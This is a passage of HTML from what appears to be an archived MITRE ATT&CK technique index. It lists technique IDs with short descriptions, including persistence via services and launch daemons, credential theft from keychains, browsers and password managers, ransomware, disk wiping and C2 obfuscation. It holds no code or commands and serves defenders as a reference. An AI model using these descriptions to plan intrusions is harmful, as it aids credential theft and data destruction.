href="/versions/v9/techniques/T1543/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1543/003"> Windows Service </a> </td> <td> Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and <a href="/versions/v9/software/S0075">Reg</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1543/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1543/004"> Launch Daemon </a> </td> <td> Adversaries may create or modify launch daemons to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> . These LaunchDaemons have property list files which point to the executables that will be launched . </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1555"> T1555 </a> </td> <td> <a href="/versions/v9/techniques/T1555"> Credentials from Password Stores </a> </td> <td> Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1555/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1555/001"> Keychain </a> </td> <td> Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in <code>~/Library/Keychains/</code>,<code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>. The <code>security</code> command-line utility, which is built into macOS by default, provides a useful way to manage these credentials. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1555/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1555/002"> Securityd Memory </a> </td> <td> An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1555/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1555/003"> Credentials from Web Browsers </a> </td> <td> Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1555/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1555/004"> Windows Credential Manager </a> </td> <td> Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1555/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1555/005"> Password Managers </a> </td> <td> Adversaries may acquire user credentials from third-party password managers. Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1485"> T1485 </a> </td> <td> <a href="/versions/v9/techniques/T1485"> Data Destruction </a> </td> <td> Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives. Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from <a href="/versions/v9/techniques/T1561/001">Disk Content Wipe</a> and <a href="/versions/v9/techniques/T1561/002">Disk Structure Wipe</a> because individual files are destroyed rather than sections of a storage disk or the disk's logical structure. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1132"> T1132 </a> </td> <td> <a href="/versions/v9/techniques/T1132"> Data Encoding </a> </td> <td> Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems. Some data encoding systems may also result in data compression, such as gzip. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1132/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1132/001"> Standard Encoding </a> </td> <td> Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME. Some data encoding systems may also result in data compression, such as gzip. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1132/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1132/002"> Non-Standard Encoding </a> </td> <td> Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1486"> T1486 </a> </td> <td> <a href="/versions/v9/techniques/T1486"> Data Encrypted for Impact </a> </td> <td> Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted. In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1530"> T1530 </a> </td> <td> <a href="/versions/v9/techniques/T1530"> Data from Cloud Storage Object </a> </td> <td> Adversaries may access data objects from improperly secured cloud storage. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1602"> T1602 </a> </td> <td> <a href="/versions/v9/techniques/T1602"> Data from Configuration Repository </a> </td> <td> Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1602/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1602/001"> SNMP (MIB Dump) </a> </td> <td> Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1602/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1602/002"> Network Device Configuration Dump </a> </td> <td> Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1213"> T1213 </a> </td> <td> <a href="/versions/v9/techniques/T1213"> Data from Information Repositories </a> </td> <td> Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1213/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1213/001"> Confluence </a> </td> <td> Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as: </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1213/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1213/002"> Sharepoint </a> </td> <td> Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint: </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1005"> T1005 </a> </td> <td> <a href="/versions/v9/techniques/T1005"> Data from Local System </a> </td> <td> Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1039"> T1039 </a> </td> <td> <a href="/versions/v9/techniques/T1039"> Data from Network Shared Drive </a> </td> <td> Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within <a href="/versions/v9/software/S0106">cmd</a> may be used to gather information. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1025"> T1025 </a> </td> <td> <a href="/versions/v9/techniques/T1025"> Data from Removable Media </a> </td> <td> Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within <a href="/versions/v9/software/S0106">cmd</a> may be used to gather information. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1565"> T1565 </a> </td> <td> <a href="/versions/v9/techniques/T1565"> Data Manipulation </a> </td> <td> Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1565/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1565/001"> Stored Data Manipulation </a> </td> <td> Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity. By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1565/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1565/002"> Transmitted Data Manipulation </a> </td> <td> Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1565/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1565/003"> Runtime Data Manipulation </a> </td> <td> Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user. By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1001"> T1001 </a> </td> <td> <a href="/versions/v9/techniques/T1001"> Data Obfuscation </a> </td> <td> Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1001/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1001/001"> Junk Data </a> </td> <td> Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1001/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1001/002"> Steganography </a> </td> <td> Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1001/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1001/003"> Protocol Impersonation </a> </td> <td> Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1074"> T1074 </a> </td> <td> <a href="/versions/v9/techniques/T1074"> Data Staged </a> </td> <td> Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as <a href="/versions/v9/techniques/T1560">Archive Collected Data</a>. Interactive command shells may be used, and common functionality within <a href="/versions/v9/software/S0106">cmd</a> and bash may be used to copy data into a staging location. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1074/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1074/001"> Local Data Staging </a> </td> <td> Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as <a href="/versions/v9/techniques/T1560">Archive Collected Data</a>. Interactive command shells may be used, and common functionality within <a href="/versions/v9/software/S0106">cmd</a> and bash may be used to copy data into a staging location. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1074/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1074/002"> Remote Data Staging </a> </td> <td> Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as <a href="/versions/v9/techniques/T1560">Archive Collected Data</a>. Interactive command shells may be used, and common functionality within <a href="/versions/v9/software/S0106">cmd</a> and bash may be used to copy data into a staging location. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1030"> T1030 </a> </td> <td> <a href="/versions/v9/techniques/T1030"> Data Transfer Size Limits </a> </td> <td> An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1491"> T1491 </a> </td> <td> <a href="/versions/v9/techniques/T1491"> Defacement </a> </td> <td> Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for <a href="/versions/v9/techniques/T1491">Defacement</a> include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of <a href="/versions/v9/techniques/T1491">Defacement</a> in order to cause user discomfort, or to pressure compliance with accompanying messages. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1491/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1491/001"> Internal Defacement </a> </td> <td> An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper. Disturbing or offensive images may be used as a part of <a href="/versions/v9/techniques/T1491/001">Internal Defacement</a> in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1491/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1491/002"> External Defacement </a> </td> <td> An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda. <a href="/versions/v9/techniques/T1491/002">External Defacement</a> may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as <a href="/versions/v9/techniques/T1189">Drive-by Compromise</a>. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1140"> T1140 </a> </td> <td> <a href="/versions/v9/techniques/T1140"> Deobfuscate/Decode Files or Information </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1027">Obfuscated Files or Information</a> to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1610"> T1610 </a> </td> <td> <a href="/versions/v9/techniques/T1610"> Deploy Container </a> </td> <td> Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1587"> T1587 </a> </td> <td> <a href="/versions/v9/techniques/T1587"> Develop Capabilities </a> </td> <td> Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1587/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1587/001"> Malware </a> </td> <td> Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1587/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1587/002"> Code Signing Certificates </a> </td> <td> Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1587/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1587/003"> Digital Certificates </a> </td> <td> Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1587/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1587/004"> Exploits </a> </td> <td> Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits. Adversaries may use information acquired via <a href="/versions/v9/techniques/T1588/006">Vulnerabilities</a> to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1006"> T1006 </a> </td> <td> <a href="/versions/v9/techniques/T1006"> Direct Volume Access </a> </td> <td> Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1561"> T1561 </a> </td> <td> <a href="/versions/v9/techniques/T1561"> Disk Wipe </a> </td> <td> Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1561/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1561/001"> Disk Content Wipe </a> </td> <td> Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1561/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1561/002"> Disk Structure Wipe </a> </td> <td> Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1484"> T1484 </a> </td> <td> <a href="/versions/v9/techniques/T1484"> Domain Policy Modification </a> </td> <td> Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1484/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1484/001"> Group Policy Modification </a> </td> <td> Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path <code>\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1484/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1484/002"> Domain Trust Modification </a> </td> <td> Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources. These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1482"> T1482 </a> </td> <td> <a href="/versions/v9/techniques/T1482"> Domain Trust Discovery </a> </td> <td> Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain. Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct <a href="/versions/v9/techniques/T1134/005">SID-History Injection</a>, <a href="/versions/v9/techniques/T1550/003">Pass the Ticket</a>, and <a href="/versions/v9/techniques/T1558/003">Kerberoasting</a>. Domain trusts can be enumerated using the <code>DSEnumerateDomainTrusts()</code> Win32 API call, .NET methods, and LDAP. The Windows utility <a href="/versions/v9/software/S0359">Nltest</a> is known to be used by adversaries to enumerate domain trusts. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1189"> T1189 </a> </td> <td> <a href="/versions/v9/techniques/T1189"> Drive-by Compromise </a> </td> <td> Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring <a href="/versions/v9/techniques/T1550/001">Application Access Token</a>. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1568"> T1568 </a> </td> <td> <a href="/versions/v9/techniques/T1568"> Dynamic Resolution </a> </td> <td> Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1568/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1568/001"> Fast Flux DNS </a> </td> <td> Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1568/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1568/002"> Domain Generation Algorithms </a> </td> <td> Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1568/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1568/003"> DNS Calculation </a> </td> <td> Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1114"> T1114 </a> </td> <td> <a href="/versions/v9/techniques/T1114"> Email Collection </a> </td> <td> Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1114/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1114/001"> Local Email Collection </a> </td> <td> Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1114/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1114/002"> Remote Email Collection </a> </td> <td> Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as <a href="/versions/v9/software/S0413">MailSniper</a> can be used to automate searches for specific keywords. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1114/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1114/003"> Email Forwarding Rule </a> </td> <td> Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations. Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different recipient. Similarly, Google Workspace users or administrators can set up mail forwarding rules via the Google Workspace web interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1573"> T1573 </a> </td> <td> <a href="/versions/v9/techniques/T1573"> Encrypted Channel </a> </td> <td> Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1573/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1573/001"> Symmetric Cryptography </a> </td> <td> Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1573/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1573/002"> Asymmetric Cryptography </a> </td> <td> Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1499"> T1499 </a> </td> <td> <a href="/versions/v9/techniques/T1499"> Endpoint Denial of Service </a> </td> <td> Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1499/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1499/001"> OS Exhaustion Flood </a> </td> <td> Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on 